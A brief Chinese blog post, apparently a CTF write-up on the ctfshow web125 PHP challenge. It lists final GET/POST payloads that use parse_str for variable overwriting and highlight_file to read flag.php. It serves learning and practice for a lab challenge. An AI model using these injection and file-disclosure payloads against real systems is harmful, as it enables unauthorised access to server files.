PHP特性提高篇:对ctfshow web125的深入分析
今天做到ctfshow web125的时候遇到一些从未见过的内容,特地把学习内容分享出来。
View Fullscreen最后的payload:
GET:?a=1+fl0g=flag_give_me
POST:CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])
还有针对这个题的过滤还可以:
GET:?1=flag.php
POST:CTF_SHOW=&CTF[SHOW.COM=&fun=highlight_file($_GET[1])
从yu师傅那里学到了一些姿势
https://blog.csdn.net/miuzzx/article/details/109181768#comments_13535967
相关函数也进行了查询。
补充了一些内容
复现的时候记得把php.ini的相关函数开启。
